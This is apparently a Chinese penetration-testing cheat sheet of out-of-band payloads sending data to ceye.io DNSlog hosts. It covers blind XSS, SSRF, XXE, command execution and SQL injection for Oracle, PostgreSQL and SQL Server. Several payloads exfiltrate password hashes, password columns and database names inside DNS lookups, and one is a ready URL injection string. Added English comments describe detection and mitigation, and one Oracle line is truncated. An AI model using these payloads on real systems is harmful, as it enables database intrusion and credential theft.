XSS
XSS 盲打在安全测试的时候是比较常用的
payload: "<script src=http://XSS.XXXXX.ceye.io></script>"
SSRF
payload: "... <!ENTITY test SYSTEM "SSRF.xxxx.ceye.io\\aa"> ..."
XXE
<!-- Out-of-band XXE pattern: the parameter entity %file; (declared elsewhere, not in
     this fragment) is expanded into the URL of the 'send' entity, so whatever %file;
     holds travels out in the request line. Mitigation on the parsing side: disable
     DTD processing, or at least external and parameter entities, for any document
     that does not come from a trusted source. -->
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://XXXX.ceye.io/%file;'>"
>
<!-- Referencing %all; declares 'send'; presumably the outbound request itself is
     triggered by a later %send; reference that this fragment does not show. -->
%all;
命令执行
payload: " ping %PATH%.pxxx.ceye.io ..."
oracle
-- Out-of-band (DNS/HTTP) probes: each statement makes the database server itself
-- resolve or fetch an attacker-chosen hostname, so anything placed in that hostname
-- leaves via DNS even when the query result is never shown to the client.
-- Detection: DNS or HTTP egress originating from the DB host towards a domain that is
-- not on its allow-list; hostnames whose leftmost label is a hex/hash-looking string.
-- Mitigation: revoke PUBLIC EXECUTE on UTL_INADDR, UTL_HTTP and DBMS_LDAP, restrict
-- network access through Oracle network ACLs (DBMS_NETWORK_ACL_ADMIN), and block
-- outbound DNS/HTTP from database hosts at the network edge.
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.asdfg.ceye.io');                    -- forward DNS lookup only
SELECT UTL_HTTP.REQUEST('http://ip.port.asdfg.ceye.io/oracle') FROM DUAL;        -- DNS lookup plus outbound HTTP GET
SELECT HTTPURITYPE('http://ip.port.asdfg.ceye.io/oracle').GETCLOB() FROM DUAL;   -- same channel via the HTTPURITYPE object type
SELECT DBMS_LDAP.INIT(('oracle.ip.port.asdfg.ceye.io',80) FROM DUAL;             -- LDAP connect attempt; the host name must be resolved to reach the server
-- Reads the SYS password hash from SYS.USER$ and embeds it in the hostname. A SELECT on
-- SYS.USER$ from a non-SYS session is itself an audit-worthy event.
-- This line is truncated in this copy (ends at "FR").
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.asdfg.ceye.io',80) FR
postgreSQL
-- PostgreSQL out-of-band probe using a UNC-style path. The function reads one value,
-- hex-encodes it and makes the server process open
-- \\<hex>.pSQL.3.nk40ci.ceye.io\foobar.txt through COPY ... FROM, so the value leaves
-- as the leftmost DNS label of the file-server name even if the COPY then fails.
-- Forensic artefacts left behind: the table table_output and the function
-- temp_function both persist after the attack; look for them (and for a COPY ... FROM
-- statement in the server log when log_statement covers it) after a suspected injection.
-- Mitigation: COPY ... FROM a server file requires superuser or pg_read_server_files,
-- so the application role must hold neither; deny outbound DNS/SMB from the DB host.
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
-- SECURITY DEFINER (see the end of the definition): the body runs with the privileges
-- of the function owner rather than the caller.
CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);   -- hex output (0-9a-f) is a valid hostname label
-- Builds COPY table_output(content) FROM E'\\\\<hex>.pSQL.3.nk40ci.ceye.io\\foobar.txt' as a string
exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;   -- the dynamic COPY runs here; this is the point at which name resolution is triggered
END;
$$ LANGUAGE plpgSQL SECURITY DEFINER;
SELECT temp_function();
SQL Server
扩展存储过程 master..xp_dirtree() 用于获取给定文件夹内部所有子文件夹的列表。
-- Scratch variable that will hold the attacker-chosen UNC host name.
DECLARE @host varchar(1024);
声明一个名为 @host、类型为 varchar(1024) 的变量。
-- db_name() becomes the leftmost label of the hostname: the data is encoded into the
-- name itself, so a single DNS query carries it out of the network.
SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.ceye.io';
获取 db_name() 并转换成 varchar 类型，再把返回值拼接到 dnslog 平台提供的子域名前面，然后赋值给 @host 变量。
-- xp_dirtree against a UNC path makes the SQL Server service account resolve @host and
-- attempt a connection to it. Detection: calls to master..xp_dirtree (and the other
-- master..xp_* file-system procedures) with a '\\' argument in audit/extended-event
-- logs, and outbound DNS or SMB originating from the database host.
-- Mitigation: revoke EXECUTE on these procedures from non-sysadmin roles, make sure the
-- application login is not sysadmin, and block outbound 53/445 from the DB host.
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');
列远程主机的foobar$目录,由于是远程主机,所以会做一个dns解析,这样我们的dns平台就能得到日志了
http://xxxx.com.cn/?Id=123';DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.ceye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--
msSQL
-- Same technique as above, captured in URL-encoded form (%2b is '+'): this copy is what
-- appears in a web-server request log rather than console-ready T-SQL. It hex-encodes a
-- password column value and ships it as the leftmost DNS label.
-- A request whose query string contains DECLARE/EXEC together with xp_dirtree is a
-- high-fidelity WAF/log signature; the root-cause fix is parameterised queries in the
-- web tier so that no SQL is built from the request.
DECLARE @host varchar(1024);
SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass)))
FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
参考自知识盒子